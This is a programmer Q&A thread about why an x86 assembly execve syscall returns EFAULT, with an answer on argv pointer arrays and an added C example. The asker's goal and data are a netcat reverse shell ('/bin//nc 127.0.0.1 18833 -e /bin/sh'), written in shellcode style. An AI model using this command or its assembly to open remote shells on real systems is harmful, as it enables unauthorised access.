
Linux Sys_execve won't run in assembly

I am writing an assembly program which needs to make a call to netcat and execute a program over the internet.

As I understand it, for an execve command, you point the EBX register to the program you want to run with a null byte at the end to terminate. You point the ECX register to arguments separated by null bytes with 2 null bytes at the end of the list of args. You just set EDX to a bunch of null bytes.

At my int 0x80 call to execute the command, my registers look like this:

EAX: 11 #system call
EBX: 0x0783140 #/bin//nc
ECX: 0x078314a #args
EDX: 0x07831a4 #env

Here's the value of the memory at 0x0783140 in ASCII:

[null byte] = 0x00

/bin//nc[null byte]127.0.0.1[null byte]18833[null byte]-e[null byte]/bin/sh[null byte][null byte]

EBX points to '/bin//nc'
ECX points to '127.0.0.1'
RDX just points to a bunch of null bytes

The program will get to the int 0x80 call, but it will immediately return and put 0xfffffff2 in the EAX register.

Any help would be great.

EDIT: Thanks to ephemient, I'm now able to actually run netcat, but somehow I think my args are not being read by the program correctly. I think this because netcat runs but immediately exits with exit code 1, and no connection is established to my listener.

ECX now points to this in memory (note: I put spaces between the addresses for readability, but they do not exist in my program):

0x78315e 0x783168 0x78316e 0x783171 0x00000000

0x78315e => 127.0.0.1[Null Byte]
0x783168 => 18833[Null Byte]
0x78316e => -e[Null Byte]
0x783171 => /root/myprogram[Null Byte]

I have quadruple-checked that the addresses actually point to the ASCII values above.

You're getting errno=EFAULT (0xfffffff2 = -14, 14 = EFAULT), indicating that you're passing a bad address to the syscall.

SYS_execve takes 3 arguments, but the second and third are NULL-terminated arrays of pointers to argument/environment strings, not a single string of NUL-separated components. Interpreting the string as an array of pointers means the first 4 bytes of the string are interpreted as the address of the first string, but it's not a valid address, hence EFAULT.

SYSCALL_DEFINE3(execve,
                const char __user *, filename,
                const char __user *const __user *, argv,
                const char __user *const __user *, envp)
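To make the layout concrete, here is an added C example (not code from the question or the answer) that turns the flat NUL-separated string from the question into the NULL-terminated pointer array execve actually expects, decodes the raw 0xfffffff2 return value as EFAULT, and then runs /bin/echo through fork/execve with a constructed argv. The helper names (raw_to_errno, flat_to_vector, question_arg) are my own.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Raw int 0x80 reports failure as -errno in EAX (range -4095..-1), so
   0xfffffff2 = -14 = EFAULT. Added helper, not code from the page. */
static int raw_to_errno(unsigned int eax)
{
    return eax >= (unsigned int)-4095 ? (int)(0u - eax) : 0;
}

/* Turn the question's flat layout ("a\0b\0c\0\0", empty string ends the list)
   into what execve wants: a NULL-terminated array of POINTERS to the strings.
   Returns the entry count, or -1 if `vec` is too small. Added helper. */
static int flat_to_vector(const char *flat, const char **vec, size_t vecsz)
{
    size_t n = 0;
    while (*flat != '\0') {
        if (n + 1 >= vecsz) return -1;      /* keep room for the NULL slot */
        vec[n++] = flat;                    /* store the address, not the bytes */
        flat += strlen(flat) + 1;           /* hop over the string and its NUL */
    }
    vec[n] = NULL;                          /* terminator the kernel scans for */
    return (int)n;
}

/* The question's byte string, reconstructed (adjacent literals keep "\0127"
   from being read as an octal escape); returns argv[i] or NULL past the end. */
static const char *question_arg(int i)
{
    static const char flat[] = "/bin//nc\0" "127.0.0.1\0" "18833\0" "-e\0" "/bin/sh\0";
    const char *vec[8];
    int n = flat_to_vector(flat, vec, 8);
    return (i >= 0 && i < n) ? vec[i] : NULL;
}

int main(void)
{
    /* Constructed demo; argv[0] is the program name by convention, envp may be { NULL }. */
    static const char flat[] = "/bin/echo\0" "argv is a pointer array\0";
    const char *argv[4], *envp[1] = { NULL };
    int status = 0, n = flat_to_vector(flat, argv, 4);
    printf("%d argv entries; 0xfffffff2 -> errno %d (EFAULT=%d)\n", n, raw_to_errno(0xfffffff2u), EFAULT);
    pid_t pid = n > 0 ? fork() : -1;
    if (pid == 0) { execve(argv[0], (char *const *)argv, (char *const *)envp); _exit(127); }
    if (pid > 0) waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : 1;
}
```

The same pointer array built in assembly is simply the four (or five) string addresses stored back to back, followed by a zero dword; ECX then holds the address of that table, not the address of the first string.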
